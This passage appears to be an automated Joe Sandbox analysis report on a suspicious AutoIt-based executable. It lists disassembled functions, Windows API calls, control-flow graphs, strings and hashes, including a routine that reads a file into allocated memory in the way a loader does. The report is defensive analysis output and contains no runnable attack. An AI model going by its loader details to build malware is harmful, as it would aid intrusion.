                                              • Instruction Fuzzy Hash: 1DF0A0308609105BC6206BBCAC0E8BA377D9F05334F244703F876D22F1EBB1999886A5
                                              Function 00D7BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: p#
                                              • API String ID: 3964851224-4182048217
                                              • Opcode ID: 9c04949797cb38e5376b1d748c0112d67fe122b9600cfb78746b3c8a65237784
                                              • Instruction ID: c7cee81fc9546b1b032ecafcecdd2261578d7c46f28c9d74ca26632bbe2c0e4b
                                              • Opcode Fuzzy Hash: 9c04949797cb38e5376b1d748c0112d67fe122b9600cfb78746b3c8a65237784
                                              • Instruction Fuzzy Hash: 40A23970618341DFD714DF18C480B2ABBE1FF89304F18996DE99A9B352E771E845CBA2
                                              Function 00D7D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetInputState.USER32 ref: 00D7D807
                                              • timeGetTime.WINMM ref: 00D7DA07
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB28
                                              • TranslateMessage.USER32(?), ref: 00D7DB7B
                                              • DispatchMessageW.USER32(?), ref: 00D7DB89
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB9F
                                              • Sleep.KERNEL32(0000000A), ref: 00D7DBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                              • String ID:
                                              • API String ID: 2189390790-0
                                              • Opcode ID: 4d2c09246b32d51847b8531fd2d2eb78a04ce3c853663e7e6bd1e1889bef591b
                                              • Instruction ID: 46d146281e32820e871faa945fc93dce810f850d6d5bec846eb96818effae6fb
                                              • Opcode Fuzzy Hash: 4d2c09246b32d51847b8531fd2d2eb78a04ce3c853663e7e6bd1e1889bef591b
                                              • Instruction Fuzzy Hash: 1C42BF306082429FD725DF25C844F6AB7B2FF86304F18865DE59997291E771E888CFB2
                                              Function 00DB065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 301 db065b-db068b call db042f 304 db068d-db0698 call d9f2c6 301->304 305 db06a6-db06b2 call da5221 301->305 310 db069a-db06a1 call d9f2d9 304->310 311 db06cb-db0714 call db039a 305->311 312 db06b4-db06c9 call d9f2c6 call d9f2d9 305->312 319 db097d-db0983 310->319 321 db0781-db078a GetFileType 311->321 322 db0716-db071f 311->322 312->310 325 db078c-db07bd GetLastError call d9f2a3 CloseHandle 321->325 326 db07d3-db07d6 321->326 323 db0721-db0725 322->323 324 db0756-db077c GetLastError call d9f2a3 322->324 323->324 328 db0727-db0754 call db039a 323->328 324->310 325->310 340 db07c3-db07ce call d9f2d9 325->340 331 db07d8-db07dd 326->331 332 db07df-db07e5 326->332 328->321 328->324 333 db07e9-db0837 call da516a 331->333 332->333 334 db07e7 332->334 343 db0839-db0845 call db05ab 333->343 344 db0847-db086b call db014d 333->344 334->333 340->310 343->344 350 db086f-db0879 call da86ae 343->350 351 db087e-db08c1 344->351 352 db086d 344->352 350->319 353 db08c3-db08c7 351->353 354 db08e2-db08f0 351->354 352->350 353->354 356 db08c9-db08dd 353->356 357 db097b 354->357 358 db08f6-db08fa 354->358 356->354 357->319 358->357 360 db08fc-db092f CloseHandle call db039a 358->360 363 db0963-db0977 360->363 364 db0931-db095d GetLastError call d9f2a3 call da5333 360->364 363->357 364->363
                                              APIs
                                                • Part of subcall function 00DB039A: CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              • GetLastError.KERNEL32 ref: 00DB076F
                                              • __dosmaperr.LIBCMT ref: 00DB0776
                                              • GetFileType.KERNELBASE(00000000), ref: 00DB0782
                                              • GetLastError.KERNEL32 ref: 00DB078C
                                              • __dosmaperr.LIBCMT ref: 00DB0795
                                              • CloseHandle.KERNEL32(00000000), ref: 00DB07B5
                                              • CloseHandle.KERNEL32(?), ref: 00DB08FF
                                              • GetLastError.KERNEL32 ref: 00DB0931
                                              • __dosmaperr.LIBCMT ref: 00DB0938
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction ID: 09cd2feb246b7f5cd14186369b64031f846a1317cfb82994ec65e28e2140b79a
                                              • Opcode Fuzzy Hash: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction Fuzzy Hash: 19A1F636A141048FDF19AF68D851BEE7FA0EB06320F180169F816EB391DB359917CBB1
                                              Function 00D7344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D73357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D73379
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D7356A
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DB318D
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DB31CE
                                              • RegCloseKey.ADVAPI32(?), ref: 00DB3210
                                              • _wcslen.LIBCMT ref: 00DB3277
                                              • _wcslen.LIBCMT ref: 00DB3286
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 98802146-2727554177
                                              • Opcode ID: e40fe6b9b78a3b1b6d303aaf1d1dc694340b62899055d5556758063783619acc
                                              • Instruction ID: 1705538104b4676fd21778cb692a001d0ad80a5ba2fd8bd6027f62860cbf71c4
                                              • Opcode Fuzzy Hash: e40fe6b9b78a3b1b6d303aaf1d1dc694340b62899055d5556758063783619acc
                                              • Instruction Fuzzy Hash: 8071A6714043019EC314EF66DC8299BBBF8FF95740F90452EF649A31A1EB319A49CB72
                                              Function 00D72B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72B8E
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00D72B9D
                                              • LoadIconW.USER32(00000063), ref: 00D72BB3
                                              • LoadIconW.USER32(000000A4), ref: 00D72BC5
                                              • LoadIconW.USER32(000000A2), ref: 00D72BD7
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D72BEF
                                              • RegisterClassExW.USER32(?), ref: 00D72C40
                                                • Part of subcall function 00D72CD4: GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                                • Part of subcall function 00D72CD4: RegisterClassExW.USER32(00000030), ref: 00D72D31
                                                • Part of subcall function 00D72CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72D42
                                                • Part of subcall function 00D72CD4: LoadIconW.USER32(000000A9), ref: 00D72D85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 2880975755-4155596026
                                              • Opcode ID: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction ID: 518c6625a526e1a8d88633778676087ca685eb8da1ab518b404a87e6cd83b614
                                              • Opcode Fuzzy Hash: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction Fuzzy Hash: 99216A78E40314AFCF109FA7EC45BA97FB4FB49B40F16009AE500B66A0D3B1058ACF90
                                              Function 00D7DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                              • API String ID: 0-2799515523
                                              • Opcode ID: 520a015f3f8f2d8a93adb6bf469f206b193bfc1e8f56026e512323f591ca6aac
                                              • Instruction ID: d1657301476d3c31c7fc87d62cee6e8165490ed67e1839b715f3c94961c543b3
                                              • Opcode Fuzzy Hash: 520a015f3f8f2d8a93adb6bf469f206b193bfc1e8f56026e512323f591ca6aac
                                              • Instruction Fuzzy Hash: 2FC26A75A00215CFCB24DF58C881AADB7B1FF09304F2885A9E959AB391E375ED41CBB1
                                              Function 00D72CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                              • RegisterClassExW.USER32(00000030), ref: 00D72D31
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72D42
                                              • LoadIconW.USER32(000000A9), ref: 00D72D85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction ID: 30e0d99a3a4f77251cfb8833333ba867be97116e6878fde7a3e8c9b977c07b62
                                              • Opcode Fuzzy Hash: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction Fuzzy Hash: 1221E3B5901308AFDF00DFA6E849BDDBBB4FB49700F10825AF611B62A0D7B10589CF90
                                              Function 00DA8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1012 da8d45-da8d55 1013 da8d6f-da8d71 1012->1013 1014 da8d57-da8d6a call d9f2c6 call d9f2d9 1012->1014 1016 da90d9-da90e6 call d9f2c6 call d9f2d9 1013->1016 1017 da8d77-da8d7d 1013->1017 1030 da90f1 1014->1030 1035 da90ec call da27ec 1016->1035 1017->1016 1020 da8d83-da8dae 1017->1020 1020->1016 1023 da8db4-da8dbd 1020->1023 1026 da8dbf-da8dd2 call d9f2c6 call d9f2d9 1023->1026 1027 da8dd7-da8dd9 1023->1027 1026->1035 1028 da8ddf-da8de3 1027->1028 1029 da90d5-da90d7 1027->1029 1028->1029 1033 da8de9-da8ded 1028->1033 1034 da90f4-da90f9 1029->1034 1030->1034 1033->1026 1037 da8def-da8e06 1033->1037 1035->1030 1040 da8e08-da8e0b 1037->1040 1041 da8e23-da8e2c 1037->1041 1043 da8e0d-da8e13 1040->1043 1044 da8e15-da8e1e 1040->1044 1045 da8e4a-da8e54 1041->1045 1046 da8e2e-da8e45 call d9f2c6 call d9f2d9 call da27ec 1041->1046 1043->1044 1043->1046 1049 da8ebf-da8ed9 1044->1049 1047 da8e5b-da8e79 call da3820 call da29c8 * 2 1045->1047 1048 da8e56-da8e58 1045->1048 1078 da900c 1046->1078 1082 da8e7b-da8e91 call d9f2d9 call d9f2c6 1047->1082 1083 da8e96-da8ebc call da9424 1047->1083 1048->1047 1051 da8edf-da8eef 1049->1051 1052 da8fad-da8fb6 call daf89b 1049->1052 1051->1052 1055 da8ef5-da8ef7 1051->1055 1065 da8fb8-da8fca 1052->1065 1066 da9029 1052->1066 1055->1052 1059 da8efd-da8f23 1055->1059 1059->1052 1063 da8f29-da8f3c 1059->1063 1063->1052 1068 da8f3e-da8f40 1063->1068 1065->1066 1071 da8fcc-da8fdb GetConsoleMode 1065->1071 1070 da902d-da9045 ReadFile 1066->1070 1068->1052 1073 da8f42-da8f6d 1068->1073 1075 da90a1-da90ac GetLastError 1070->1075 1076 da9047-da904d 1070->1076 1071->1066 1077 da8fdd-da8fe1 1071->1077 1073->1052 1081 da8f6f-da8f82 1073->1081 1084 da90ae-da90c0 call d9f2d9 call d9f2c6 1075->1084 1085 da90c5-da90c8 1075->1085 1076->1075 1086 da904f 1076->1086 1077->1070 1079 da8fe3-da8ffd ReadConsoleW 1077->1079 1080 da900f-da9019 call da29c8 1078->1080 1087 da901e-da9027 1079->1087 1088 da8fff GetLastError 1079->1088 1080->1034 1081->1052 1092 da8f84-da8f86 1081->1092 1082->1078 1083->1049 1084->1078 1089 da90ce-da90d0 1085->1089 1090 da9005-da900b call d9f2a3 1085->1090 1096 da9052-da9064 1086->1096 1087->1096 1088->1090 1089->1080 1090->1078 1092->1052 1099 da8f88-da8fa8 1092->1099 1096->1080 1103 da9066-da906a 1096->1103 1099->1052 1104 da906c-da907c call da8a61 1103->1104 1105 da9083-da908e 1103->1105 1117 da907f-da9081 1104->1117 1111 da909a-da909f call da88a1 1105->1111 1112 da9090 call da8bb1 1105->1112 1118 da9095-da9098 1111->1118 1112->1118 1117->1080 1118->1117
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction ID: 4155228e6fca55b796afc2ca21663f9dd609e1174b1007ed670170bafc905512
                                              • Opcode Fuzzy Hash: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction Fuzzy Hash: 7CC1F074A04249AFCF11EFA9C851BADBBB0AF0B310F1841A9F954E7392C7318942CB75
                                              Function 01043830 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1120 1043830-10438de call 1041270 1123 10438e5-104390b call 1044740 CreateFileW 1120->1123 1126 1043912-1043922 1123->1126 1127 104390d 1123->1127 1132 1043924 1126->1132 1133 1043929-1043943 VirtualAlloc 1126->1133 1128 1043a5d-1043a61 1127->1128 1130 1043aa3-1043aa6 1128->1130 1131 1043a63-1043a67 1128->1131 1134 1043aa9-1043ab0 1130->1134 1135 1043a73-1043a77 1131->1135 1136 1043a69-1043a6c 1131->1136 1132->1128 1139 1043945 1133->1139 1140 104394a-1043961 ReadFile 1133->1140 1141 1043b05-1043b1a 1134->1141 1142 1043ab2-1043abd 1134->1142 1137 1043a87-1043a8b 1135->1137 1138 1043a79-1043a83 1135->1138 1136->1135 1145 1043a8d-1043a97 1137->1145 1146 1043a9b 1137->1146 1138->1137 1139->1128 1147 1043963 1140->1147 1148 1043968-10439a8 VirtualAlloc 1140->1148 1143 1043b1c-1043b27 VirtualFree 1141->1143 1144 1043b2a-1043b32 1141->1144 1149 1043ac1-1043acd 1142->1149 1150 1043abf 1142->1150 1143->1144 1145->1146 1146->1130 1147->1128 1151 10439af-10439ca call 1044990 1148->1151 1152 10439aa 1148->1152 1153 1043ae1-1043aed 1149->1153 1154 1043acf-1043adf 1149->1154 1150->1141 1160 10439d5-10439df 1151->1160 1152->1128 1155 1043aef-1043af8 1153->1155 1156 1043afa-1043b00 1153->1156 1158 1043b03 1154->1158 1155->1158 1156->1158 1158->1134 1161 10439e1-1043a10 call 1044990 1160->1161 1162 1043a12-1043a26 call 10447a0 1160->1162 1161->1160 1168 1043a28 1162->1168 1169 1043a2a-1043a2e 1162->1169 1168->1128 1170 1043a30-1043a34 CloseHandle 1169->1170 1171 1043a3a-1043a3e 1169->1171 1170->1171 1172 1043a40-1043a4b VirtualFree 1171->1172 1173 1043a4e-1043a57 1171->1173 1172->1173 1173->1123 1173->1128
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01043901
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01043B27
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFileFreeVirtual
                                              • String ID:
                                              • API String ID: 204039940-0
                                              • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                              • Instruction ID: 29a5c61838a212b92c8fc01c4e65ba307ef0a71adfeb6aa6a49ce77f139ad7ba
                                              • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                              • Instruction Fuzzy Hash: 3DA129B4E40219EBDB14CFA4C894BEEBBB5BF48304F1091A9E255BB280D7759A41CF94
                                              Function 00D72C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1184 d72c63-d72cd3 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72C91
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72CB2
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CC6
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CCF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction ID: e92ef892e28111665a0be85f6e7bdf5c8a88ddeeb176bfe67a534e6466854c85
                                              • Opcode Fuzzy Hash: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction Fuzzy Hash: 80F0DA799402907EEB311B27AC49E7B2EBDD7C7F50B16109AF900B25A0C671189ADAB0
                                              Function 01043620 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1299 1043620-104372d call 1041270 call 1043510 CreateFileW 1306 1043734-1043744 1299->1306 1307 104372f 1299->1307 1310 1043746 1306->1310 1311 104374b-1043765 VirtualAlloc 1306->1311 1308 10437e4-10437e9 1307->1308 1310->1308 1312 1043767 1311->1312 1313 1043769-1043780 ReadFile 1311->1313 1312->1308 1314 1043784-10437be call 1043550 call 1042510 1313->1314 1315 1043782 1313->1315 1320 10437c0-10437d5 call 10435a0 1314->1320 1321 10437da-10437e2 ExitProcess 1314->1321 1315->1308 1320->1321 1321->1308
                                              APIs
                                                • Part of subcall function 01043510: Sleep.KERNELBASE(000001F4), ref: 01043521
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01043723
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 3ZCE7KQQ5Q00S
                                              • API String ID: 2694422964-995754217
                                              • Opcode ID: 348da9c1924058288485560fc1bf8dfeffd8931f534e33340d94dbb639168fb5
                                              • Instruction ID: c104a5d3ce8abe4e2636ec54c082f0edd4d10040e43bcaefdf0a1cd5e1f8e5f5
                                              • Opcode Fuzzy Hash: 348da9c1924058288485560fc1bf8dfeffd8931f534e33340d94dbb639168fb5
